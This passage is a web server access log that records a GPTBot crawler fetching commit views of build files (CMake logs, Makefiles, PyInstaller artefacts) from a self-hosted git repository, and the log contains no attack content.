74.7.227.38] [Length 11041] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10958] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:16:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29832] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29838] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:16:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:16:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11212] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11213] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11894] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11071] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29800] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11212] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29829] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:16:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10958] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11896] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:51:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:16:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:16:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 11137] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:16:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 22103] [Gzip 11.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:16:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 40478] [Gzip 14.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:16:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 23496] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:16:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16203] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" -[17/Feb/2026:16:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16206] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" -[17/Feb/2026:16:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16205] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" -[17/Feb/2026:16:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr 